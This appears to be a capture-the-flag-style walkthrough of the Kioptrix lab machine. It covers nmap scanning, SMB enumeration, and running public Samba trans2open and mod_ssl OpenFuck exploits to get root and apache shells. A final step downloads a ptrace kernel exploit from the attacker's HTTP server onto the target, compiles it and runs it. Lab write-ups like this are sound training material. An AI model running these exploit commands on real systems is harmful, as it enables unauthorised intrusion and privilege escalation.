Lab list

Host discovery

nmap 192.168.1.1/24 -sn --min-rate 2222 -R

-sn: No port scan. A ping sweep that only tries to determine whether the target hosts are up.
--min-rate: Minimum packet rate per second; here set to 2222 packets per second.
-R: Enable reverse DNS lookup, trying to resolve a hostname for each target IP address.

Port scan

nmap 192.168.1.129 -p- --min-rate 9999 -sS -PN -oA nmap_results/nmap_port

-PN: Disable host discovery. Even if the target does not answer ping, Nmap still port-scans it.

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
1024/tcp open  kdm

Service fingerprinting on the open ports

# Collect the open ports into one list
cat nmap_port.nmap | grep open | awk -F '/' '{print $1}' | tr '\n' ','
# 22,80,111,139,443,1024,
nmap 192.168.1.129 -p 22,80,111,139,443,1024 -sV -sC -O --version-all -oA nmap_results/server_info

-sC: Run the default NSE scripts.
-O: Enable OS detection.
--version-all: Try to obtain version information for all services, not only the open ones.
PORT     STATE SERVICE     VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 b8746cdbfd8be666e92a2bdf5e6f6486 (RSA1)
| 1024 8f8e5b81ed21abc180e157a33c85c471 (DSA)
|_ 1024 ed4ea94a0614ff1514ceda3a80dbe281 (RSA)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods:
|_ Potentially risky methods: TRACE
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after: 2010-09-26T09:32:06
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2023-11-22T04:20:04+00:00; +1h01m51s from scanner time.
|_http-title: 400 Bad Request
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:9A:80:72 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: 1h01m50s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
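As an added example (not part of the original writeup), the port-consolidation pipeline above and a first triage of the scan results done in Python over a constructed copy of the nmap output: it extracts the open-port list for the follow-up nmap -p scan and flags the obsolete protocols and versions (SSHv1, SSLv2, Apache 1.3.x, OpenSSL 0.9.x) that belong on a remediation list. Ports, services and patterns are taken from the scan output shown above; the sample text itself is constructed.

```python
import re

# Constructed sample in the shape of the nmap normal output shown above
NMAP_OUTPUT = """\
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2:
|   SSLv2 supported
1024/tcp open  status      1 (RPC #100024)
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# Obsolete protocols/versions worth a remediation ticket (checked against version + NSE lines)
LEGACY_CHECKS = [
    (r"Server supports SSHv1", "SSHv1 enabled"),
    (r"SSLv2 supported", "SSLv2 enabled"),
    (r"Apache(?: httpd)?/?\s*1\.3\.", "Apache 1.3.x (end of life)"),
    (r"OpenSSL/0\.9\.", "OpenSSL 0.9.x (end of life)"),
]

def parse_open_ports(text):
    """Map each open port to its proto, service, version and NSE script lines."""
    ports, current = {}, None
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            current = int(port) if state == "open" else None
            if current is not None:
                ports[current] = {"proto": proto, "service": service,
                                  "version": version, "scripts": []}
        elif line.startswith("|") and current is not None:
            # "|_" / "| " lines are NSE output for the port parsed just before
            ports[current]["scripts"].append(line.lstrip("|_ ").strip())
    return ports

def port_list(text):
    """Comma-joined open ports for 'nmap -p', without the trailing comma."""
    return ",".join(str(p) for p in parse_open_ports(text))

def legacy_findings(text):
    """Return (port, finding) pairs for obsolete services seen in the scan."""
    found = []
    for port, info in parse_open_ports(text).items():
        blob = info["version"] + "\n" + "\n".join(info["scripts"])
        found += [(port, label) for pattern, label in LEGACY_CHECKS if re.search(pattern, blob)]
    return found
```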

Web directory scan

dirb http://192.168.1.129

==> DIRECTORY: http://192.168.1.129/manual/
==> DIRECTORY: http://192.168.1.129/mrtg/
==> DIRECTORY: http://192.168.1.129/usage/

Vulnerability search

searchsploit Apache httpd 1.3

Port 139 SMB (enum4linux, smbclient)

Enumeration with enum4linux and smbclient

enum4linux is a tool for enumerating SMB services on Windows and Linux systems. It quickly extracts information from SMB-related targets.

enum4linux 192.168.1.129
# Two shares found

smbclient --no-pass //192.168.1.129
smbclient --no-pass //192.168.1.129/IPC$
smbclient --no-pass //192.168.1.129/ADMIN$
smbclient "\\\\192.168.1.129\\IPC$"

# Share ADMIN$ found: anonymous login works, but file access is denied

SMB version detection

Service enumeration did not reveal the Samba version, so use the MSF smb_version module to detect it.

msf6> search smb_version
msf6> use auxiliary/scanner/smb/smb_version
msf6> set rhosts 192.168.1.129
msf6> options
msf6> run

Unix (Samba 2.2.1a)

Samba RCE (CVE-2003-0201)

Try the Samba remote code execution exploit: Samba < 2.2.8 (Linux/BSD) - Remote Code Execution

searchsploit samba 2.2
searchsploit samba -m 10

gcc 10.c -o ./shellasroot
./shellasroot -b 0 -v 192.168.1.129

Got a root shell.

Samba trans2open overflow (CVE-2003-0201)

Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)

Requires the MSF exploit/linux/samba/trans2open module with the payload set to linux/x86/shell_reverse_tcp.

Apache mod_ssl remote buffer overflow (CVE-2002-0082)

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Over

Download the exploit

searchsploit Apache 1.3 -m 47080

Compile it

gcc 47080.c -o ssl_mod -lcrypto
If compilation fails with "openssl/ssl.h: No such file":

apt-get install libssl-dev

./ssl_mod 0x6b 192.168.1.129 443 -c 40

Got a shell, but not as root.

cat /proc/version

Linux version 2.4.7-10 (bhcompile@stripples.devel.redhat.com) (gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-98)) #1 Thu Sep 6 16:46:36 EDT 2001

After getting a shell as apache, the exploit automatically downloads ptrace-kmod.c and compiles it with gcc, but reports that the file cannot be found.

Download ptrace-kmod.c locally on Kali; its comments show it is a kernel-vulnerability privilege escalation.

searchsploit ptrace

Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege | linux/local/3.c

Serve the file with Python's HTTP server to transfer it into /tmp on the target, then run ./47080 again.

// Kali
python3 -m http.server --bind 0.0.0.0 9000

// target, as the apache user
cd /tmp
wget http://192.168.1.128:9000/ptrace-kmod.c
gcc -o exploit ptrace-kmod.c -B /usr/bin
chmod +x exploit
# It must be run here; I don't know why it fails once I exit, so be sure to run the script on the target itself
./exploit